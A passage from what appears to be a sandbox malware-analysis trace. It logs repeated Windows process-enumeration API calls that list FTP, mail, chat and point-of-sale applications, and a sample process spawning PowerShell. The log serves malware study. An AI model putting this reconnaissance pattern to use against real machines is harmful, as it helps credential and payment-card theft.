lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="searching-municipal-mm.exe")) returned 1 [0054.078] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fifty.exe")) returned 1 [0054.079] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="rope_woods_bracelets.exe")) returned 1 [0054.080] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sitemap_instructors.exe")) returned 1 [0054.081] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="underwear_consolidated.exe")) returned 1 [0054.082] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dear hearings faq.exe")) returned 1 [0054.083] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="effectiveness.exe")) returned 1 [0054.083] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0054.084] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="pest.exe")) returned 1 [0054.085] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="intl-costume.exe")) returned 1 [0054.092] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressions_binding_prospects.exe")) returned 1 [0054.093] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0054.094] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0054.095] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0054.096] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0054.097] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0054.097] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0054.098] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0054.099] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0054.100] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0054.101] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0054.102] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0054.103] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0054.104] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0054.105] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0054.106] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0054.107] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0054.107] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0054.108] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0054.109] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0054.110] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0054.111] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0054.111] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0054.112] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0054.113] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0054.114] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0054.115] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xcbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0054.116] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0054.117] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0054.117] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0054.118] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0054.119] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0054.120] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0054.121] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0054.122] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0054.122] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0054.123] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0054.124] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0054.125] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xce0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0054.126] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0054.127] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0054.127] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0054.128] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0054.129] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0054.130] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0054.131] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="consistseq.exe")) returned 1 [0054.132] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.287] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.288] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.289] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0054.290] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0054.291] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0054.292] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0054.292] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0054.293] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1174, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.294] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x116c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.295] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1164, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.296] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.297] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x13c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="osggoz.exe")) returned 1 [0054.298] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.299] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x13c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0054.300] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x13c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 0 [0054.300] CloseHandle (hObject=0x2cc) returned 1 [0054.300] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2c4 [0054.311] Process32First (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.312] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.313] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.314] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.315] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.316] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.317] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.317] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.318] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.319] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.330] Process32Next (in: hSnapshot=0x2c4, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, 